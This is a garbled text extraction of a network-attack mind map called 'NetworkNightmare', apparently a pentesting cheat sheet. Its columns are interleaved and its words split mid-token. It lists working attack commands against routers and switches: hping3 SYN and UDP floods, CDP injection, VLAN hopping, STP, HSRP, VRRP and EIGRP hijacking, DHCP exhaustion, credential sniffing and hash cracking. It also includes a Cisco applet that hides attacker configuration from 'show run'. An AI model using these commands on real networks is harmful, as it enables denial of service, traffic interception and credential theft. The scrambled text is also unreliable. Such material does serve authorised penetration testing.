Professional Documents
Culture Documents
NetworkNightmare by Caster
NetworkNightmare by Caster
by Caster (https://github.com/c4s73r)
It is recommended to write applets for other commands as well (show ssh, show users and other commands)
Attacker Side:
Owned(config-applet)#event cli pattern "show run" sync yes
sudo ip link add name evilgre type gre local <Attacker IP> remote <Victim IP>
for hiding u
ser Owned(config-applet)#action 1.0 cli command "show run | exclude hidden | event | action"
Cisco IOS:
Cisco IOS OSPF S ave traffic to .pcap ettercap -Tqr dump.pcap B ruteforce with John
EdgeGW(config)#interface tunnel 1
sudo ip link add name evilgre type gre local <Attacker IP> remote <Victim IP>
T ACACS+ S niff & capture T ACACS+ key with Loki tool Bruteforce TACACS+ k ey with Loki
sudo ip addr add 172.16.0.1/24 dev evilgre
RouterOS IP
Addressing i nformation
RouterOS:
CDP/LLDP/MNDP/EDP
S ilentBridge with c ustom hardware Evil Twin Bypassing T ype 5 (MD5) hashcat (-m 500)
sudo watch -n 60 "tcpreplay -i eth0 cdp-packet.cap" (inject CDP frame every 60 sec)
CDP Injection
Traffic Interception with Cisco ERSPAN
CSR(config-mon-erspan-src)#destination
sudo dhclient -v ethX.<VLAN ID> Mindmap by Caster CSR(config-mon-erspan-src-dst)#origin ip address <source ERSPAN device IP>
VLAN Bypassing
ONE-WAY ATTACK!!! EXPERIMENTAL!!! Scapy D ouble Tagging
Traffic Hijacking [admin@EdgeGW] > /tool sniffer
sudo python3 helloflooding.py --interface ethX --asn X --subnet X.X.X.X/X EIGRPWN Toolkit by C
aster F ake EIGRP neighbors
theevilbit/ciscot7 sudo iptables -t mangle -L
Y ersinia V TP frame Injection NAC/802.1X Bypassing: Enable Masquerading
Orange-Cyberdefense/fenrir-ocd (for capturing incoming
sudo iptables -t nat -A POSTROUTING -o ethX -j MASQUERADE
Y ersinia, Scapy DHCP Exhaustion A ttack Prologue & o ut traffic)
DoS scipag/nac_bypass
S capy ICMP Smurf s0lst1c3/silentbridge P romisc mode sudo ip link set ethX promisc on
sudo hping3 -c <packet count> -d <bytes> -S -w <TCP window size> \
Credentials Sniffing: sudo modprobe nf_conntrack
h ping3 TCP SYN Flood N AT Helper sudo echo "1" > /proc/sys/net/netfilter/nf_conntrack_helper
-p <target TCP port> --flood --rand-source <target IP> lgandx/PCredz
DanMcInerney/net-creds Disable ICMP Redirect
sudo sysctl -w net.ipv4.conf.all.accept_redirects=0
sudo hping3 --udp -p <target UDP port> -d <UDP DGRAM size> <target IP> h ping3 UDP Flood
Configuration Exfiltration: on your host sudo sysctl -w net.ipv6.conf.all.accept_redirects=0
sudo python3 relationshipnightmare.py --interface ethX \
Sab0tag3d/SIET
EIGRPWN Toolkit by C
aster Reset EIGRP n eighborship Checking subnets under attack
--asn X --src <target EIGRP router IP> (the larger the h ost mask, the higher the DoS risk)
sudo python3 arp_cage.py ethX <target subnet> <target IP> arp_cage.py tool by s0i37 A RP Cage Attack S TP Hijacking "Grit" toolkit by Caster sudo python3 stpexploit.py --interface ethX --mac XX:XX:XX:XX:XX:XX
there is a n automatic exchange of route information) Inject HSRP Packet with MAX priority (255
Remove current d efault route & create
FRR(config)# ip forwarding
H SRP Loki / Yersinia / Scapy new default route t hrough the previous ACTIVE route
FRR(config)# router ospf
Connect to routing d omain F RRouting OSPF Enable M ASQUERAD
FRR(config)# network <Attacker IP/32> area <area ID>
MITM Attacks If necessary, crack H SRP authentication with hsrp2john.py
FRR(config)# ip forwarding
Dynamic
Inject VRRP Packet with MAX priority (255
IGP Routing F HRP Hijacking V RRP Loki / Yersinia / Scapy Remove current d efault route & create
FRR(config)# router eigrp <AS Number>
C onnect to AS EIGRP F RRouting EIGRP new default route t hrough the previous MASTER route
FRR(config)# network <Attacker IP/32> Enable M ASQUERADE